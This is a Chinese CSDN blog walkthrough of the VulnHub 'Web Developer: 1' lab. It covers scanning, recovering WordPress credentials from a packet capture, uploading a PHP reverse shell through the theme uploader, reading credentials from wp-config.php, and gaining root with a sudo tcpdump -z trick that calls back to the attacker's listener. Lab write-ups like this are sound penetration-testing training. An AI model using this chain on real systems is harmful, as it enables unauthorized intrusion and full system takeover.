WebDeveloper:1靶机

最新推荐文章于 2024-08-14 20:14:24 发布
最新推荐文章于 2024-08-14 20:14:24 发布
阅读量411 收藏 6
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zdd1453691081/article/details/141199244
版权

信息收集:

靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/

(1)ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:0F:DB:75'

(2)端口扫描

nmap -p- -A 192.168.254.160

(3)目录扫描,发现ipdata目录

dirb http://192.168.254.160

(4)进入该目录发现一个流量包,下载使用wireshark打开

(5)查看后发现wordpress后台用户密码:、

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

(6)拼接/wp-admin,用找到的用户名密码登录wordpress,登录成功

(7)利用wordpress的上传theme功能getshell,在下处发现一处文件上传页面

getshell:

(1)把kali linux自带的php反弹shell代码(/usr/share/webshells/php/php-reverse-shell.php)直接把/usr/share/webshells/php/php-reverse-shell.php改一下$ip和$port,保存,并上传。

cd /usr/share/webshells/php
mv php-reverse-shell.php /home/kali/Desktop 
cd /home/kali/Desktop 
vim php-reverse-shell.php

(2)尝试访问扫描结果之后发现,上传的反弹shell在wp-content/uploads/ 目录的子目录下

(3)进行反弹监听

(4)输入以下命令得到交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

(5)用linpeas.sh找到webdeveloper用户账号密码,进入到/var/www/html/wp-config.php

cd /var/www/html/wp-config.php
找到数据库wordpress的用户名和密码
webdeveloper : MasterOfTheUniverse

(6)尝试用这个账户密码进行ssh登录

ssh webdeveloper@192.168.254.160

提权:

(1)首先,输入如下命令查找php-reverse-shell.php的位置

find / -name php-reverse-shell.php 2>/dev/null
找到其位置在/var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php

(2)然后输入以下命令

COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

(3)攻击机监听的2333端口下出现root用户的反弹shell,提权成功

阿卡丽的神秘铺子
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub:WebDeveloper:1靶机
qq_43884092的博客
03-27 231
目录爆破发现ipdata目录,进入该目录发现一个流量包,下载使用wireshark打开,查看/var/www/html/wp-config.php获得数据库账号密码,同时该密码也是系统用户webdeveloper的密码
【vulnhub】WebDeveloper:1靶机
wbplife的博客
08-11 384
把kali linux自带的php反弹shell代码(/usr/share/webshells/php/php-reverse-shell.php)直接把/usr/share/webshells/php/php-reverse-shell.php改一下$ip和$port,保存,并上传。找到其位置在/var/www/html/wp-content/uploads/2022/01/php-reverse-shell.php。首先,输入如下命令查找php-reverse-shell.php的位置。
WebDeveloper:1靶机渗透测试
weixin_58786230的博客
08-14 514
【代码】WebDeveloper:1靶机渗透测试。
【Vulnhub靶机WEB DEVELOPER: 1
所有文章均免费阅读,大家一起学习
07-04 286
然后浏览器访问http://192.168.233.140//wp-content/themes/twentysixteen/404.php。将主题背景改为Twenty Sixteen,点击select然后将404.php源码再次修改为反弹shell的代码。结果如下,可以看到发往/wordpress/wp-login.php的POST报文中携带了。用找到的用户名密码登录wordpress,登录成功。查看webdeveloper用户的sudo命令\。查看一下网站根目录下面的文件。发现开放的端口有22 80。
vulnhub Web Developer: 1
箭雨镜屋
01-02 1936
本文思路: nmap扫描---->dirb扫描---->wireshark分析.cap文件发现wordpress用户名和密码---->利用wordpress的上传theme功能getshell---->用linpeas.sh找到webdeveloper用户账号密码---->利用tcpdump命令进行sudo提权
vulnhub靶场,WEB DEVELOPER: 1
kukudeshuo的博客
12-21 942
vulnhub靶场,WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
vulnhub靶场,WEB DEVELOPER:1——新手进阶2
m0_75051044的博客
01-25 1927
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式,使攻击机和靶机的网络连接一样。然后浏览器访问http://192.168.109.191//wp-content/themes/twentysixteen/404.php。发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)使用arp-scan -l扫描确定靶机ip,当然也可以用nmap和netdiscover。
Vulnhub靶机渗透测试实战(二):Web Developer: 1
weixin_41038469的博客
03-18 3259
靶机下载地址: https://www.vulnhub.com/entry/webdeveloper-1,288/ 攻击机ip: 172.20.10.5 经过主机发现 靶机ip地址: 172.20.10.11 上传shellcode 发现后台有更改插件代码的功能,选择Plugins->Editor 选择要更改的插件:Hello Dolly 上传shellcode,以获得反弹shell fso...
WebDeveloper靶机复现
weixin_52956666的博客
08-12 341
cd /var/www/html/ ,查看 wp-config.php 文件。在wireshark里面查看,发现wordpress的账户密码。密码:Te5eQg&4sBS!靶机ip为192.168.112.137。sudo -l查看发现没有免密操作。账号:webdeveloper。账号:webdeveloper。使用kali反弹shell。改成kali的ip进行监听。sudo -l查看免密操作。发现可以文件上传的地方。发现了数据库的账号密码。getshell成功。
靶机渗透】BLOGGER: 1
weixin_47443077的博客
06-16 971
靶机渗透】BLOGGER: 1 0x01靶机介绍 1.详情 链接: https://www.vulnhub.com/entry/blogger-1,675/ 2.描述 James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style ???? 一位Web 开发
小白的靶机VulnHub-Web Developer
热门推荐
wo41ge的博客
02-02 1万+
靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 开机界面 就是这样 同样是选择桥接 确定靶机的IP地址:192.168.1.10 靶机开放了22和80端口 还是wordpress框架 访问康康呗 dirb直接扫目录 发现目录/ipdata 有一个数据包 用wireshark 打开分析一下 过滤下http的数据包信息 然后就发现了 账号密码 账号:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd
获取靶机Web Developer 文件/root/flag.txt中flag
qq_49085383的博客
12-07 2546
实验四文章目录前言1、发现目标 ,找到WebDeveloper的IP地址2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况3、若目标主机提供了HTTP服务,尝试利用浏览器访问目录4、利用whatweb探测目标网站使用的CMS模板5、网络搜索wpscan,简要说明其功能。6、使用 Dirb 爆破网站目录7、浏览器访问该目录(路径),发现一个cap文件8、利用Wireshark分析该数据包9、利用上一步得到的信息进入网站后台10、利用该CMS存在的(插件Plugin)漏洞,获得账号密码利用文件管理插件
vulnhub - webdeveloper考点:(信息搜集&wireshark&wordpress漏洞&linux tcpdump提权)
冬萍子癸水
04-23 338
https://www.vulnhub.com/entry/web-developer-1,288/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了。。 nmap看到80,22 80当然是web里搜集信息,22要想到可能会ssh登录。。 进去看到是WordPress博客,要想到wpscan扫它,扫出了用户,不过没有太亮眼的其他发现。 dirbuster之类的扫目录,发现登录框。。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8421
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于单片机的红外感应防盗报警器的硬件设计-本科毕业设计.doc
08-27
基于单片机的红外感应防盗报警器的硬件设计-本科毕业设计.doc
java基于ssm+vue量化积分管理系统源码 带毕业论文
08-27
【资源说明】 1、开发环境:ssm框架;内含Mysql数据库;VUE技术 2、该资源包括项目的全部源码,下载可以直接使用! 3、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 4、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
毕业设计(论文)-基于51单片机的硬件加密锁的设计与实现.doc
08-27
毕业设计(论文)-基于51单片机的硬件加密锁的设计与实现.doc
模块化生产系统硬件设计.doc
最新发布
08-27
模块化生产系统硬件设计.doc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值